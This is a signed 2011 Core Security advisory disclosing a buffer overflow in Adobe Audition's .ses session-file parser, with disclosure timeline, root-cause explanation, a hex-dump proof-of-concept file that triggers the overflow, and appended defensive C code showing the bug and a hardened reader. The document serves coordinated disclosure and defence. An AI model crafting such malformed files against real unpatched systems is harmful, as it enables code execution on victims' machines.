-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/

Adobe Audition vulnerability processing malformed session file


1. *Advisory Information*

Title: Adobe Audition vulnerability processing malformed session file
Advisory ID: CORE-2011-0204
Advisory URL: http://www.coresecurity.com/content/Adobe-Audition-malformed-SES-file
Date published: 2011-05-12
Date of last update: 2011-05-12
Vendors contacted: Adobe
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Buffer Overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-0615


3. *Vulnerability Description*

Adobe Audition is digital audio workstation software for Windows. It was
originally developed by Syntrillium as Cool Edit Pro and acquired by Adobe
in 2003. The software allows users to mix and edit multitrack audio and
stores multitrack sessions in its session file format (.ses).

Adobe Audition is vulnerable to numerous buffer overflows while parsing
several fields inside the TRKM chunk of session (.ses) files. The resulting
memory corruption can be leveraged to execute arbitrary code on vulnerable
systems by enticing users to open specially crafted session files.

This vulnerability could be used by a remote attacker to execute arbitrary
code with the privileges of the user that opened the malicious file.


4. *Vulnerable packages*

   . Adobe Audition 3.0.1.
   . Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

   . Adobe Audition CS5.5.


6. *Vendor Information, Solutions and Workarounds*

Adobe strongly recommends that Audition users discontinue use of the Adobe
Session (.ses) file format and switch to the XML session format. With the
release of Audition CS5.5, the binary Audition Session (.ses) file format is
no longer supported.


7. *Credits*

These vulnerabilities were discovered by Diego Juarez, Eduardo Koch and
Laura Balian from Core Security Technologies. Additional research,
exploitability analysis and PoC were made by Diego Juarez from Core Exploit
Writers Team.


8. *Technical Description / Proof of Concept Code*

Adobe Audition is vulnerable to numerous buffer overflows while parsing
several fields inside the 'TRKM' chunk of session (.ses) files.

The vulnerability comes from passing a wrongly assumed maximum buffer size
to the function found at address 0x483F065A. This function has a prototype
similar to this:

/-----
unsigned int 483F065A(wchar_t *dest, unsigned int size, wchar_t *src);
-----/

The 'size' parameter is expected to be a count of WCHARs, but (while parsing
session files) the calling code passes a size expressed in bytes. The
function therefore accepts twice as much data as the destination can hold,
leading to multiple buffer overflows in several fields of the 'TRKM' chunk
of the session file.


8.1. *Proof of Concept*

The following (dumped) .ses file should trigger the vulnerability.

/-----
00000000: 43 4F 4F 4C-4E 45 53 53-D5 01 00 00-54 52 4B 4D COOLNESS+? TRKM
00000010: 48 A3 00 00-01 00 00 00-07 00 00 00-02 00 00 00 Hú ? ? ?
00000020: 0B 00 00 00-41 00 75 00-64 00 69 00-6F 00 54 00 ? A u d i o T
00000030: 72 00 61 00-63 00 6B 00-00 00 1E A3-00 00 10 27 r a c k ?ú ?'
00000040: 00 00 07 00-00 00 4D 00-61 00 73 00-74 00 65 00 ? M a s t e
00000050: 72 00 00 00-00 00 00 00-00 00 00 00-00 00 30 00 r 0
00000060: 01 00 00 00-00 00 01 00-00 00 00 00-01 00 00 00 ? ? ?
00000070: 20 4E 00 00-01 00 00 00-20 00 00 00-40 1F 00 00 N ? @?
00000080: 02 00 00 00-1B 00 00 00-41 00 75 00-64 00 69 00 ? ? A u d i
00000090: 74 00 69 00-6F 00 6E 00-20 00 33 00-2E 00 30 00 t i o n 3 . 0
000000A0: 20 00 57 00-69 00 6E 00-64 00 6F 00-77 00 73 00 W i n d o w s
000000B0: 20 00 53 00-6F 00 75 00-6E 00 64 00-00 00 05 00 S o u n d ?
000000C0: 00 00 0C 00-00 00 41 00-75 00 64 00-69 00 6F 00 ? A u d i o
000000D0: 20 00 49 00-6E 00 70 00-75 00 74 00-00 00 1B 00 I n p u t ?
000000E0: 00 00 41 00-75 00 64 00-69 00 74 00-69 00 6F 00 A u d i t i o
000000F0: 6E 00 20 00-33 00 2E 00-30 00 20 00-57 00 69 00 n 3 . 0 W i
00000100: 6E 00 64 00-6F 00 77 00-73 00 20 00-53 00 6F 00 n d o w s S o
00000110: 75 00 6E 00-64 00 00 00-FF FF FF FF-0D 00 00 00 u n d ?
00000120: 41 00 75 00-64 00 69 00-6F 00 20 00-4F 00 75 00 A u d i o O u
00000130: 74 00 70 00-75 00 74 00-00 00 00 00-00 00 01 00 t p u t ?
00000140: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 40 00 @
00000150: 00 00 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAA
00000160: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000170: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000180: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000190: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001A0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001B0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001C0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001D0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001E0: 41          -           -           -            A
-----/


9. *Report Timeline*

   . 2011-02-03: Core Advisories Team notifies Adobe PSIRT of several
     crashes in Adobe Audition and asks for technical assistance in order
     to determine whether these crashes can result in a security
     vulnerability.
   . 2011-02-03: Vendor acknowledges reception of the last email and
     notifies that the Adobe tracking number 850 was opened to track this
     issue.
   . 2011-02-24: Core notifies that there has been no communication in the
     last 3 weeks and asks for a status update about the reported crashes.
   . 2011-02-28: Adobe PSIRT notifies that the file format affected by the
     issue will no longer be supported with the next release of Audition,
     planned for May 2011. Vendor also notifies their plan to publish a
     Security Bulletin, including an acknowledgement for this report.
   . 2011-03-09: Core notifies that the impact of these bugs is not clear
     and requests technical information to understand the nature and root
     cause of the reported crashes rather than purely information about
     Adobe release decisions. Core also requests that Adobe clarify whether
     this bug is considered exploitable and asks if patches or fixes are
     going to be released as well.
   . 2011-03-16: Core asks for a status update.
   . 2011-03-16: PSIRT notifies that they have not done any analysis to
     determine if this issue is exploitable because:
       1. The .ses file format is an older format that will not be
          supported with the next release.
       2. The .ses files store information about a recording session; they
          are not typically exchanged between parties over email, and are
          even less likely to be accepted and opened from non-trusted
          sources.
       3. Adobe has been encouraging people to use XML files in place of
          the binary .ses file format for the last year [1].
       4. The installed base for Audition is small compared with
          higher-profile Adobe products.
     For the above mentioned reasons, vendor considers that it is not a
     high priority to perform a vulnerability analysis. Vendor also
     notifies that they are currently planning to publish a Security
     Bulletin in May 2011 with the release of the next major version of
     Audition.
   . 2011-04-04: Core notifies that additional research was done by Diego
     Juarez and the reported flaws seem to be exploitable. Core notifies
     that the advisory will be released when the Adobe patches become
     available.
   . 2011-04-04: Vendor notifies that the Adobe ID 897 was opened to track
     this case and that they are on track for releasing patches in May.
   . 2011-04-28: Core notifies that the advisory publication was
     rescheduled to May 10th and requests confirmation for a coordinated
     release. Core also requests further information regarding the affected
     and patched version numbers.
   . 2011-05-05: Vendor notifies that these issues should be resolved in the
     upcoming release of Adobe Audition planned for May 10th.
   . 2011-05-06: Vendor notifies that due to a last minute change, the
     release was tentatively rescheduled for May 12th.
   . 2011-05-06: Core reschedules advisory publication for May 12th.
   . 2011-05-12: Advisory CORE-2011-0204 is published.


10. *References*

[1] http://blogs.adobe.com/insidesound/2010/03/audition_xml_session_format.html


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important areas
of computer security including system vulnerabilities, cyber attack
planning and simulation, source code auditing, and cryptography. Our
results include problem formalization, identification of vulnerabilities,
novel solutions and prototypes for new technologies. CoreLabs regularly
publishes security advisories, technical papers, project information and
shared software tools for public use at: http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and prove real-world exposures to their most critical assets. Our customers
can gain real visibility into their security standing, real validation of
their security controls, and real metrics to more effectively secure their
organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAk3MJSwACgkQyNibggitWa0eXQCdHKHspwXyJu8ZwHyf2sFlOrfg
6YwAn0Pf2/bZJ80H2C2IfO0fG9BpvP4d
=EybH
-----END PGP SIGNATURE-----
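Added illustration of the root cause described in section 8; this is example code written for this page, not Audition's code or Core's PoC. It models the bounded copy from the prototype in section 8 (a 'size' counted in 16-bit units) and a hardened reader for the length-prefixed UTF-16 string fields whose layout is inferred from the dump (a 32-bit little-endian unit count including the terminator, then the units); uint16_t stands in for WCHAR so the unit is 2 bytes on every platform, and the 64-byte destination size is an assumption.

```c
#include <stdint.h>
#include <stddef.h>

typedef uint16_t u16;            /* one UTF-16 code unit (2 bytes on every platform) */
#define DEST_BYTES 64            /* assumed size of the fixed destination buffer, in bytes */
#define DEST_UNITS (DEST_BYTES / sizeof(u16))

/* Bounded copy shaped like the function the advisory describes: 'size' is a
 * count of 16-bit units and bounds the writes, terminator included.
 * Returns the number of units copied, not counting the terminator. */
static size_t bounded_wcopy(u16 *dest, size_t size, const u16 *src, size_t src_units)
{
    size_t n = 0;
    while (n < src_units && n + 1 < size && src[n] != 0) { dest[n] = src[n]; n++; }
    if (size > 0) dest[n] = 0;
    return n;
}

/* Shows the unit mismatch: passing the destination size in bytes where units
 * are expected lets the copy run twice as far. Writes go to a scratch buffer
 * twice DEST_BYTES, so nothing is corrupted; the return value is how many
 * bytes would have landed past a DEST_BYTES-sized destination. */
static size_t overflow_bytes(int pass_size_in_bytes)
{
    u16 scratch[DEST_BYTES] = {0};          /* 2 * DEST_BYTES of room */
    u16 src[80];                            /* constructed: 79 units of 0x4141, like the PoC field */
    for (size_t i = 0; i < 79; i++) src[i] = 0x4141;
    src[79] = 0;
    size_t size = pass_size_in_bytes ? DEST_BYTES : DEST_UNITS;
    size_t bytes = (bounded_wcopy(scratch, size, src, 80) + 1) * sizeof(u16);
    return bytes > DEST_BYTES ? bytes - DEST_BYTES : 0;
}

/* Hardened reader for one string field (layout inferred from the dump:
 * uint32 LE count of units including the NUL, followed by the units).
 * Returns units stored (excluding the NUL), or -1 when the record is malformed. */
static long read_string_field(const uint8_t *buf, size_t len, u16 *dest, size_t dest_units)
{
    if (len < 4) return -1;
    uint32_t count = buf[0] | (uint32_t)buf[1] << 8 | (uint32_t)buf[2] << 16 | (uint32_t)buf[3] << 24;
    if (count == 0 || count > (len - 4) / sizeof(u16)) return -1; /* count exceeds data present */
    if (count > dest_units) return -1;                            /* compared in UNITS, not bytes */
    size_t n = 0;
    for (; n + 1 < count; n++) dest[n] = (u16)(buf[4 + 2 * n] | buf[5 + 2 * n] << 8);
    dest[n] = 0;
    return (long)n;
}
```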